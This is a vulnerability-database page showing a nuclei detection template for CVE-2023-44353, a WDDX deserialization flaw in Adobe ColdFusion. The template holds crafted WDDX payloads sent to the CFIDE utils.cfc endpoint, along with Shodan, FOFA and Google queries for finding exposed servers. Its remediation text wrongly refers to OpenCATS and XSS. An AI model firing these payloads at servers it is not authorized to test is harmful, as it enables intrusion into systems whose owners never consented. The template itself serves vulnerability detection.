Lucene search
K

Adobe ColdFusion WDDX Deserialization Gadgets

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 175 Views

Adobe ColdFusion WDDX Deserialization Gadgets vulnerability in 2023.5 and 2021.11, allowing arbitrary code execution without user interaction. Mitigation via patches or upgrade

Related
Refs
Code
id: CVE-2023-44353

info:
  name: Adobe ColdFusion WDDX Deserialization Gadgets
  author: salts
  severity: critical
  description: |
    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
  impact: |
    Unauthenticated attackers can exploit WDDX deserialization vulnerabilities in Adobe ColdFusion to execute arbitrary code without user interaction and completely compromise ColdFusion installations.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44353
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
    - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
    - https://github.com/JC175/CVE-2023-44353-Nuclei-Template
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-44353
    cwe-id: CWE-502
    epss-score: 0.80178
    epss-percentile: 0.9957
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,adobe,coldfusion,deserialization,xss,vuln,vkev
variables:
  windows_known_path: "C:\\Windows\\"
  windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
  linux_known_path: "/etc/"
  linux_bad_path: "/thesecretcowlevelisreal/"

http:
  - raw:
      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>

    matchers-condition: or
    matchers:
      - type: dsl
        name: windows
        dsl:
          - "status_code_1 == 500 && status_code_2 == 404"
          - contains(body_1, "coldfusion.runtime")
        condition: and

      - type: dsl
        name: linux
        dsl:
          - "status_code_3 == 500 && status_code_4 == 404"
          - contains(body_3, "coldfusion.runtime")
        condition: and
# digest: 4a0a0047304502201664f726822d082f806115cd33ef6090576ac4993dee7791315f9a10bd0421d8022100a9b1f9c3a8571584482110518f69d9bd004ddf2b6056a762c5c8bda71f0877e5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.80178
SSVC
175